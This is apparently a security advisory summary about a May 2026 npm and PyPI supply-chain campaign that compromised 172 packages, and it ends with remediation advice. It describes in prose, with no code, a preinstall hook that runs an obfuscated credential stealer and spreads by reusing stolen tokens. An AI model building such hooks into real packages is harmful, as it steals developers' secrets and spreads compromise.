The Mini Shai-Hulud supply chain campaign has returned with its largest wave, compromising 172 unique packages across 403 malicious versions on npm and PyPI within a 48-hour window on May 11-12, 2026. High-profile scopes affected include @tanstack, @uipath, @mistralai, and @opensearch-project. The attack uses a preinstall hook to download a Bun runtime and run an obfuscated JavaScript credential stealer targeting SSH keys, cloud credentials (AWS, Azure, GCP, Kubernetes), npm/GitHub tokens, CI/CD environment variables, and AI tool configs. Stolen npm tokens are then used to self-propagate by publishing new compromised versions. Developers are advised to check dependencies installed during that window, rotate all credentials, pin package versions using lockfiles, and monitor for unauthorized publishes. Mend has issued three advisories covering all 172 affected packages.
Sort: